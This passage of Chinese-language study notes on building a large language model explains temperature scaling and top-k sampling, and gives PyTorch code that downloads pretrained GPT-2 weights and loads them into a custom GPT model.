<span class="k">print</span><span class="p">(</span><span class="s">"Optimized T:"</span><span class="p">,</span> <span class="n">T</span><span class="p">.</span><span class="n">item</span><span class="p">())</span>  <span class="c1"># 输出优化后的温度参数
</span>
</code></pre></div></div>

<hr />

<h3 id="5-温度缩放的应用场景">5. <strong>温度缩放的应用场景</strong></h3>

<ul>
  <li><strong>模型校准</strong>：提高模型输出概率的可靠性，使其更接近真实概率分布。</li>
  <li><strong>不确定性估计</strong>：在需要模型输出不确定性时（如医疗诊断、自动驾驶等），温度缩放可以帮助更好地量化模型的不确定性。</li>
  <li><strong>集成方法</strong>：在模型集成（Ensemble）中，温度缩放可以用于调整每个子模型的输出概率。</li>
</ul>

<hr />

<h3 id="6-温度缩放的优缺点">6. <strong>温度缩放的优缺点</strong></h3>

<h3 id="优点">优点：</h3>

<ul>
  <li>简单易实现，只需一个额外的参数 ( T )。</li>
  <li>计算开销小，适用于大规模模型。</li>
  <li>可以有效提高模型的校准性能。</li>
</ul>

<h3 id="缺点">缺点：</h3>

<ul>
  <li>只能调整概率分布的平滑度，无法改变模型的排序能力（即模型的预测顺序不变）。</li>
  <li>对于某些复杂任务，可能需要更复杂的校准方法。</li>
</ul>

<hr />

<h3 id="总结">总结</h3>

<ul>
  <li><strong>温度缩放</strong> 是一种简单而有效的模型校准技术，通过调整 softmax 函数中的温度参数 ( T ) 来优化模型的输出概率。</li>
  <li>它广泛应用于分类任务中，尤其是在需要可靠概率估计的场景（如医疗、金融等）。</li>
  <li>温度缩放的实现非常简单，且计算开销小，是模型校准的首选方法之一。</li>
</ul>

<p>如果你有更多问题，欢迎继续讨论！</p>

<p><img src="阅读图书Build Large Language Model\image%2030.png" alt="阅读图书Build Large Language Model\image.png" /></p>

<h2 id="top-k-sampling"><strong>Top-k Sampling</strong></h2>

<p><strong>Top-k Sampling（Top-k 采样）</strong> 是一种用于生成文本的采样策略，通常用于语言模型（如 GPT 等）的文本生成任务中。它的核心思想是从模型预测的概率分布中，选择概率最高的前 ( k ) 个词（或标记，token），然后从这 ( k ) 个词中进行采样，而不是从整个词汇表中采样。</p>

<hr />

<h3 id="1-背景文本生成中的采样问题">1. <strong>背景：文本生成中的采样问题</strong></h3>

<p>在文本生成任务中，语言模型会输出一个概率分布，表示每个词（或标记）作为下一个词的可能性。传统的采样方法（如贪心搜索或随机采样）存在以下问题：</p>

<ul>
  <li><strong>贪心搜索（Greedy Search）</strong>：总是选择概率最高的词，容易导致生成的文本过于单调和重复。</li>
  <li><strong>随机采样（Random Sampling）</strong>：从整个词汇表中随机采样，可能会导致生成不连贯或不符合语境的文本。</li>
</ul>

<p>Top-k 采样是一种折衷方法，既避免了贪心搜索的单调性，又减少了随机采样的不确定性。</p>

<hr />

<h3 id="2-top-k-采样的原理">2. <strong>Top-k 采样的原理</strong></h3>

<p>Top-k 采样的核心思想是：</p>

<ol>
  <li>从模型输出的概率分布中，选择概率最高的前 ( k ) 个词。</li>
  <li>对这 ( k ) 个词的概率重新归一化（使其和为 1）。</li>
  <li>从这 ( k ) 个词中随机采样一个词作为下一个词。</li>
</ol>

<h3 id="数学公式">数学公式：</h3>

<p>假设模型输出的概率分布为 ( P(x) )，Top-k 采样的步骤如下：</p>

<ol>
  <li>选择概率最高的前 ( k ) 个词，记为 ( V_{\text{top-k}} )。</li>
  <li>重新归一化概率：
[
P_{\text{top-k}}(x) = \begin{cases}
\frac{P(x)}{\sum_{x’ \in V_{\text{top-k}}} P(x’)} &amp; \text{if } x \in V_{\text{top-k}} <br />
0 &amp; \text{otherwise}
\end{cases}
]</li>
  <li>从 ( P_{\text{top-k}}(x) ) 中随机采样一个词。</li>
</ol>

<hr />

<h3 id="3-top-k-采样的实现">3. <strong>Top-k 采样的实现</strong></h3>

<p>以下是一个简单的 Python 实现示例：</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">torch</span>
<span class="kn">import</span> <span class="nn">torch.nn.functional</span> <span class="k">as</span> <span class="n">F</span>

<span class="k">def</span> <span class="nf">top_k_sampling</span><span class="p">(</span><span class="n">logits</span><span class="p">,</span> <span class="n">k</span><span class="p">):</span>
    <span class="c1"># logits: 模型输出的未归一化概率分布，形状为 (vocab_size,)
</span>    <span class="c1"># k: 选择前 k 个词
</span>    <span class="n">probs</span> <span class="o">=</span> <span class="n">F</span><span class="p">.</span><span class="n">softmax</span><span class="p">(</span><span class="n">logits</span><span class="p">,</span> <span class="n">dim</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>  <span class="c1"># 将 logits 转换为概率分布
</span>    <span class="n">top_k_probs</span><span class="p">,</span> <span class="n">top_k_indices</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">topk</span><span class="p">(</span><span class="n">probs</span><span class="p">,</span> <span class="n">k</span><span class="p">)</span>  <span class="c1"># 选择前 k 个词的概率和索引
</span>    <span class="n">top_k_probs</span> <span class="o">=</span> <span class="n">top_k_probs</span> <span class="o">/</span> <span class="n">top_k_probs</span><span class="p">.</span><span class="nb">sum</span><span class="p">()</span>  <span class="c1"># 重新归一化
</span>    <span class="n">sampled_index</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">multinomial</span><span class="p">(</span><span class="n">top_k_probs</span><span class="p">,</span> <span class="n">num_samples</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span>  <span class="c1"># 从 top-k 中采样
</span>    <span class="k">return</span> <span class="n">top_k_indices</span><span class="p">[</span><span class="n">sampled_index</span><span class="p">]</span>  <span class="c1"># 返回采样的词索引
</span>
</code></pre></div></div>

<h3 id="示例">示例：</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># 假设模型输出的 logits
</span><span class="n">logits</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">([</span><span class="mf">1.0</span><span class="p">,</span> <span class="mf">2.0</span><span class="p">,</span> <span class="mf">3.0</span><span class="p">,</span> <span class="mf">4.0</span><span class="p">,</span> <span class="mf">5.0</span><span class="p">])</span>

<span class="c1"># 使用 Top-k 采样（k=3）
</span><span class="n">sampled_index</span> <span class="o">=</span> <span class="n">top_k_sampling</span><span class="p">(</span><span class="n">logits</span><span class="p">,</span> <span class="n">k</span><span class="o">=</span><span class="mi">3</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Sampled index:"</span><span class="p">,</span> <span class="n">sampled_index</span><span class="p">.</span><span class="n">item</span><span class="p">())</span>

</code></pre></div></div>

<hr />

<h3 id="4-top-k-采样的优点">4. <strong>Top-k 采样的优点</strong></h3>

<ol>
  <li><strong>减少低概率词的影响</strong>：通过限制采样范围，避免选择概率极低的词，从而生成更连贯的文本。</li>
  <li><strong>平衡多样性和质量</strong>：相比于贪心搜索，Top-k 采样增加了文本的多样性；相比于随机采样，Top-k 采样提高了文本的质量。</li>
  <li><strong>简单易实现</strong>：只需一个参数 ( k )，计算开销小。</li>
</ol>

<hr />

<h3 id="5-top-k-采样的缺点">5. <strong>Top-k 采样的缺点</strong></h3>

<ol>
  <li><strong>固定 ( k ) 的限制</strong>：
    <ul>
      <li>如果 ( k ) 设置过小，可能会导致生成的文本过于保守，缺乏多样性。</li>
      <li>如果 ( k ) 设置过大，可能会引入低概率词，影响文本质量。</li>
    </ul>
  </li>
  <li><strong>动态性不足</strong>：Top-k 采样对每个时间步都使用固定的 ( k )，无法根据上下文动态调整采样范围。</li>
</ol>

<hr />

<h3 id="6-top-k-采样的改进top-pnucleus采样">6. <strong>Top-k 采样的改进：Top-p（Nucleus）采样</strong></h3>

<p>为了克服 Top-k 采样的缺点，<strong>Top-p 采样（也称为 Nucleus 采样）</strong> 被提出。Top-p 采样不是固定选择前 ( k ) 个词，而是选择一个最小的词集合，使得这些词的概率之和大于等于 ( p )（例如 ( p = 0.9 )）。这样可以动态调整采样范围，适应不同的上下文。</p>

<hr />

<h3 id="7-top-k-采样的应用场景">7. <strong>Top-k 采样的应用场景</strong></h3>

<p>Top-k 采样广泛应用于以下任务：</p>

<ul>
  <li><strong>文本生成</strong>：如故事生成、对话生成、代码生成等。</li>
  <li><strong>机器翻译</strong>：生成多样化的翻译结果。</li>
  <li><strong>语音识别</strong>：生成多样化的转录结果。</li>
</ul>

<hr />

<h3 id="8-总结">8. <strong>总结</strong></h3>

<ul>
  <li><strong>Top-k 采样</strong> 是一种简单而有效的文本生成采样策略，通过限制采样范围来提高生成文本的质量和多样性。</li>
  <li>它通过选择概率最高的前 ( k ) 个词，并对这些词重新归一化后进行采样。</li>
  <li>Top-k 采样的改进版本是 <strong>Top-p 采样</strong>，后者可以动态调整采样范围，适应不同的上下文。</li>
</ul>

<p>如果你有更多问题，欢迎继续讨论！</p>

<h2 id="加载模型loading-pretrained-weights-from-openai">加载模型Loading pretrained weights from OpenAI</h2>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="k">def</span> <span class="nf">download_and_load_gpt2</span><span class="p">(</span><span class="n">model_size</span><span class="p">,</span> <span class="n">models_dir</span><span class="p">):</span>
    <span class="c1"># Validate model size
</span>    <span class="n">allowed_sizes</span> <span class="o">=</span> <span class="p">(</span><span class="s">"124M"</span><span class="p">,</span> <span class="s">"355M"</span><span class="p">,</span> <span class="s">"774M"</span><span class="p">,</span> <span class="s">"1558M"</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">model_size</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">allowed_sizes</span><span class="p">:</span>
        <span class="k">raise</span> <span class="nb">ValueError</span><span class="p">(</span><span class="sa">f</span><span class="s">"Model size not in </span><span class="si">{</span><span class="n">allowed_sizes</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>

    <span class="c1"># Define paths
</span>    <span class="n">model_dir</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">models_dir</span><span class="p">,</span> <span class="n">model_size</span><span class="p">)</span>
    <span class="n">base_url</span> <span class="o">=</span> <span class="s">"https://openaipublic.blob.core.windows.net/gpt-2/models"</span>
    <span class="n">backup_base_url</span> <span class="o">=</span> <span class="s">"https://f001.backblazeb2.com/file/LLMs-from-scratch/gpt2"</span>
    <span class="n">filenames</span> <span class="o">=</span> <span class="p">[</span>
        <span class="s">"checkpoint"</span><span class="p">,</span> <span class="s">"encoder.json"</span><span class="p">,</span> <span class="s">"hparams.json"</span><span class="p">,</span>
        <span class="s">"model.ckpt.data-00000-of-00001"</span><span class="p">,</span> <span class="s">"model.ckpt.index"</span><span class="p">,</span>
        <span class="s">"model.ckpt.meta"</span><span class="p">,</span> <span class="s">"vocab.bpe"</span>
    <span class="p">]</span>

    <span class="c1"># Download files
</span>    <span class="n">os</span><span class="p">.</span><span class="n">makedirs</span><span class="p">(</span><span class="n">model_dir</span><span class="p">,</span> <span class="n">exist_ok</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">filename</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
        <span class="n">file_url</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">base_url</span><span class="p">,</span> <span class="n">model_size</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
        <span class="n">backup_url</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">backup_base_url</span><span class="p">,</span> <span class="n">model_size</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
        <span class="n">file_path</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">model_dir</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
        <span class="n">download_file</span><span class="p">(</span><span class="n">file_url</span><span class="p">,</span> <span class="n">file_path</span><span class="p">,</span> <span class="n">backup_url</span><span class="p">)</span>

    <span class="c1"># Load settings and params
</span>    <span class="n">tf_ckpt_path</span> <span class="o">=</span> <span class="n">tf</span><span class="p">.</span><span class="n">train</span><span class="p">.</span><span class="n">latest_checkpoint</span><span class="p">(</span><span class="n">model_dir</span><span class="p">)</span>
    <span class="n">settings</span> <span class="o">=</span> <span class="n">json</span><span class="p">.</span><span class="n">load</span><span class="p">(</span><span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">model_dir</span><span class="p">,</span> <span class="s">"hparams.json"</span><span class="p">)))</span>
    <span class="n">params</span> <span class="o">=</span> <span class="n">load_gpt2_params_from_tf_ckpt</span><span class="p">(</span><span class="n">tf_ckpt_path</span><span class="p">,</span> <span class="n">settings</span><span class="p">)</span>

    <span class="k">return</span> <span class="n">settings</span><span class="p">,</span> <span class="n">params</span>

<span class="c1"># Define model configurations in a dictionary for compactness
</span><span class="n">model_configs</span> <span class="o">=</span> <span class="p">{</span>
    <span class="s">"gpt2-small (124M)"</span><span class="p">:</span> <span class="p">{</span><span class="s">"emb_dim"</span><span class="p">:</span> <span class="mi">768</span><span class="p">,</span> <span class="s">"n_layers"</span><span class="p">:</span> <span class="mi">12</span><span class="p">,</span> <span class="s">"n_heads"</span><span class="p">:</span> <span class="mi">12</span><span class="p">},</span>
    <span class="s">"gpt2-medium (355M)"</span><span class="p">:</span> <span class="p">{</span><span class="s">"emb_dim"</span><span class="p">:</span> <span class="mi">1024</span><span class="p">,</span> <span class="s">"n_layers"</span><span class="p">:</span> <span class="mi">24</span><span class="p">,</span> <span class="s">"n_heads"</span><span class="p">:</span> <span class="mi">16</span><span class="p">},</span>
    <span class="s">"gpt2-large (774M)"</span><span class="p">:</span> <span class="p">{</span><span class="s">"emb_dim"</span><span class="p">:</span> <span class="mi">1280</span><span class="p">,</span> <span class="s">"n_layers"</span><span class="p">:</span> <span class="mi">36</span><span class="p">,</span> <span class="s">"n_heads"</span><span class="p">:</span> <span class="mi">20</span><span class="p">},</span>
    <span class="s">"gpt2-xl (1558M)"</span><span class="p">:</span> <span class="p">{</span><span class="s">"emb_dim"</span><span class="p">:</span> <span class="mi">1600</span><span class="p">,</span> <span class="s">"n_layers"</span><span class="p">:</span> <span class="mi">48</span><span class="p">,</span> <span class="s">"n_heads"</span><span class="p">:</span> <span class="mi">25</span><span class="p">},</span>
<span class="p">}</span>

<span class="c1"># Copy the base configuration and update with specific model settings
</span><span class="n">model_name</span> <span class="o">=</span> <span class="s">"gpt2-small (124M)"</span>  <span class="c1"># Example model name
</span><span class="n">NEW_CONFIG</span> <span class="o">=</span> <span class="n">GPT_CONFIG_124M</span><span class="p">.</span><span class="n">copy</span><span class="p">()</span>
<span class="n">NEW_CONFIG</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">model_configs</span><span class="p">[</span><span class="n">model_name</span><span class="p">])</span>
<span class="n">NEW_CONFIG</span><span class="p">.</span><span class="n">update</span><span class="p">({</span><span class="s">"context_length"</span><span class="p">:</span> <span class="mi">1024</span><span class="p">,</span> <span class="s">"qkv_bias"</span><span class="p">:</span> <span class="bp">True</span><span class="p">})</span>

<span class="n">gpt</span> <span class="o">=</span> <span class="n">GPTModel</span><span class="p">(</span><span class="n">NEW_CONFIG</span><span class="p">)</span>
<span class="n">gpt</span><span class="p">.</span><span class="nb">eval</span><span class="p">();</span>

<span class="k">def</span> <span class="nf">assign</span><span class="p">(</span><span class="n">left</span><span class="p">,</span> <span class="n">right</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">left</span><span class="p">.</span><span class="n">shape</span> <span class="o">!=</span> <span class="n">right</span><span class="p">.</span><span class="n">shape</span><span class="p">:</span>
        <span class="k">raise</span> <span class="nb">ValueError</span><span class="p">(</span><span class="sa">f</span><span class="s">"Shape mismatch. Left: </span><span class="si">{</span><span class="n">left</span><span class="p">.</span><span class="n">shape</span><span class="si">}</span><span class="s">, Right: </span><span class="si">{</span><span class="n">right</span><span class="p">.</span><span class="n">shape</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">torch</span><span class="p">.</span><span class="n">nn</span><span class="p">.</span><span class="n">Parameter</span><span class="p">(</span><span class="n">torch</span><span class="p">.</span><span class="n">tensor</span><span class="p">(</span><span class="n">right</span><span class="p">))</span>

<span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="n">np</span>

<span class="k">def</span> <span class="nf">load_weights_into_gpt</span><span class="p">(</span><span class="n">gpt</span><span class="p">,</span> <span class="n">params</span><span class="p">):</span>
    <span class="n">gpt</span><span class="p">.</span><span class="n">pos_emb</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span><span class="n">gpt</span><span class="p">.</span><span class="n">pos_emb</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">params</span><span class="p">[</span><span class="s">'wpe'</span><span class="p">])</span>
    <span class="n">gpt</span><span class="p">.</span><span class="n">tok_emb</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span><span class="n">gpt</span><span class="p">.</span><span class="n">tok_emb</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">params</span><span class="p">[</span><span class="s">'wte'</span><span class="p">])</span>
    
    <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">])):</span>
        <span class="n">q_w</span><span class="p">,</span> <span class="n">k_w</span><span class="p">,</span> <span class="n">v_w</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">split</span><span class="p">(</span>
            <span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"attn"</span><span class="p">][</span><span class="s">"c_attn"</span><span class="p">])[</span><span class="s">"w"</span><span class="p">],</span> <span class="mi">3</span><span class="p">,</span> <span class="n">axis</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_query</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_query</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">q_w</span><span class="p">.</span><span class="n">T</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_key</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_key</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">k_w</span><span class="p">.</span><span class="n">T</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_value</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_value</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> <span class="n">v_w</span><span class="p">.</span><span class="n">T</span><span class="p">)</span>

        <span class="n">q_b</span><span class="p">,</span> <span class="n">k_b</span><span class="p">,</span> <span class="n">v_b</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">split</span><span class="p">(</span>
            <span class="p">(</span><span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"attn"</span><span class="p">][</span><span class="s">"c_attn"</span><span class="p">])[</span><span class="s">"b"</span><span class="p">],</span> <span class="mi">3</span><span class="p">,</span> <span class="n">axis</span><span class="o">=-</span><span class="mi">1</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_query</span><span class="p">.</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_query</span><span class="p">.</span><span class="n">bias</span><span class="p">,</span> <span class="n">q_b</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_key</span><span class="p">.</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_key</span><span class="p">.</span><span class="n">bias</span><span class="p">,</span> <span class="n">k_b</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_value</span><span class="p">.</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">W_value</span><span class="p">.</span><span class="n">bias</span><span class="p">,</span> <span class="n">v_b</span><span class="p">)</span>

        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">out_proj</span><span class="p">.</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">out_proj</span><span class="p">.</span><span class="n">weight</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"attn"</span><span class="p">][</span><span class="s">"c_proj"</span><span class="p">][</span><span class="s">"w"</span><span class="p">].</span><span class="n">T</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">out_proj</span><span class="p">.</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">att</span><span class="p">.</span><span class="n">out_proj</span><span class="p">.</span><span class="n">bias</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"attn"</span><span class="p">][</span><span class="s">"c_proj"</span><span class="p">][</span><span class="s">"b"</span><span class="p">])</span>

        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">weight</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"mlp"</span><span class="p">][</span><span class="s">"c_fc"</span><span class="p">][</span><span class="s">"w"</span><span class="p">].</span><span class="n">T</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">bias</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"mlp"</span><span class="p">][</span><span class="s">"c_fc"</span><span class="p">][</span><span class="s">"b"</span><span class="p">])</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="n">weight</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="n">weight</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"mlp"</span><span class="p">][</span><span class="s">"c_proj"</span><span class="p">][</span><span class="s">"w"</span><span class="p">].</span><span class="n">T</span><span class="p">)</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="n">bias</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">ff</span><span class="p">.</span><span class="n">layers</span><span class="p">[</span><span class="mi">2</span><span class="p">].</span><span class="n">bias</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"mlp"</span><span class="p">][</span><span class="s">"c_proj"</span><span class="p">][</span><span class="s">"b"</span><span class="p">])</span>

        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm1</span><span class="p">.</span><span class="n">scale</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm1</span><span class="p">.</span><span class="n">scale</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"ln_1"</span><span class="p">][</span><span class="s">"g"</span><span class="p">])</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm1</span><span class="p">.</span><span class="n">shift</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm1</span><span class="p">.</span><span class="n">shift</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"ln_1"</span><span class="p">][</span><span class="s">"b"</span><span class="p">])</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm2</span><span class="p">.</span><span class="n">scale</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
            <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm2</span><span class="p">.</span><span class="n">scale</span><span class="p">,</span> 
            <span class="n">params</span><span class="p">[</span><span class="s">"blocks"</span><span class="p">][</span><span class="n">b</span><span class="p">][</span><span class="s">"ln_2"</span><span class="p">][</span><span class="s">"g"</span><span class="p">])</span>
        <span class="n">gpt</span><span class="p">.</span><span class="n">trf_blocks</span><span class="p">[</span><span class="n">b</span><span class="p">].</span><span class="n">norm2</span><span class="p">.</span><span class="n">shift</span> <span class="o">=</span> <span class="n">assign</span><span class="p">(</span>
